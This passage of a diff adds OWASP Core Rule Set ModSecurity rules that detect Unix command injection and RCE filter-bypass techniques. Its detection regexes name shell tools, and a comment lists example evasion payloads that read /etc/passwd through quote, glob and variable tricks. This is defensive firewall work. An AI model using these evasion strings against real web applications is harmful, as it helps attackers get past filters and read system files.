PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932231.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932231 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\v].*\b" \ + "id:932231,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# This is a stricter sibling of rule 932130. +# +# It applies the same regular expression to the +# User-Agent and Referer HTTP headers. +# +# Unlike the sibling rule, this rule runs in phase 1. +# +# Regular expression generated from regex-assembly/932131.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932131 +# +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\})|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \ + "id:932131,\ + phase:1,\ + block,\ + capture,\ + t:none,t:cmdLine,\ + msg:'Remote Command Execution: Unix Shell Expression Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Rule 932200 ]=- +# +# Block RCE Bypass using different techniques: +# - uninitialized variables (https://www.secjuice.com/web-application-firewall-waf-evasion/) +# - string concatenations (https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) +# - globbing patterns (https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) +# +# Examples: +# - foo;cat$u+/etc$u/passwd +# - bar;cd+/etc;/bin$u/ca*+passwd +# - foo;ca\t+/et\c/pa\s\swd +# - foo;c'at'+/etc/pa's'swd +# - foo;c$@at+/et$@c/pas$@swd +# - foo;c$!at+/et$!c/pas$!swd +# - foo;c$*at+/et$*c/pas$*swd +# - foo;c$?at+/et$?c/pas$?swd +# - foo;c$-at+/et$-c/pas$-swd +# - foo;c$_at+/et$_c/pas$_swd +# - foo;c$$at+/et$$c/pas$$swd +# +# Regex notes: https://regex101.com/r/V6wrCO/1 +# +# Regular expression generated from regex-assembly/932200.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932200 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]" \ + "id:932200,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,t:urlDecodeUni,\ + msg:'RCE Bypass Technique',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932200_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.932200_matched_var_name=%{matched_var_name}',\ + chain" + SecRule MATCHED_VAR "@rx /" \ + "t:none,t:urlDecodeUni,\ + chain" + SecRule MATCHED_VAR "@rx \s" \ + "t:none,t:urlDecodeUni,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Rule 932205 ]=- +# +# Sibling of 932200 targeting the Referer header. URLs cause false positives in rule 932200 +# and must be handled with additional checks. +# +# Regular expression generated from regex-assembly/932205.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932205 +# +SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]+\.[^;\?]+[;\?](.*(['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]))" \ + "id:932205,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,t:urlDecodeUni,\ + msg:'RCE Bypass Technique',\ + logdata:'Matched Data: %{TX.2} found within %{TX.932205_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.932205_matched_var_name=%{matched_var_name}',\ + chain" + SecRule TX:1 "@rx /" \ + "t:none,t:urlDecodeUni,\ + chain" + SecRule TX:1 "@rx \s" \ + "t:none,t:urlDecodeUni,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Rule 932206 ]=- +# +# Sibling of 932200 targeting the Referer header. URLs cause false positives in rule 932200 +# and must be handled with additional checks. +# +# Regular expression generated from regex-assembly/932206.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932206 +# +SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{])" \ + "id:932206,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,t:urlDecodeUni,\ + msg:'RCE Bypass Technique',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932206_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.932206_matched_var_name=%{matched_var_name}',\ + chain" + SecRule MATCHED_VAR "@rx /" \ + "t:none,t:urlDecodeUni,\ + chain" + SecRule MATCHED_VAR "@rx \s" \ + "t:none,t:urlDecodeUni,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# Regular expression generated from regex-assembly/932220.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932220 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\v]*|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|G[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?E[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?T|a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:b|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?t|r(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[jp])?|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ks])|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[8-9][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?9|[au][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[gr])|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[bdx]|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|q[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[c-dgi]|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[chr][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|o|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b)|j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s|q)|k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d)?|[nps]|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a|z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?4)?)|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|v)|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[at][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|f|(?:k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?g|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[cp]|r(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)?|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dv]|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]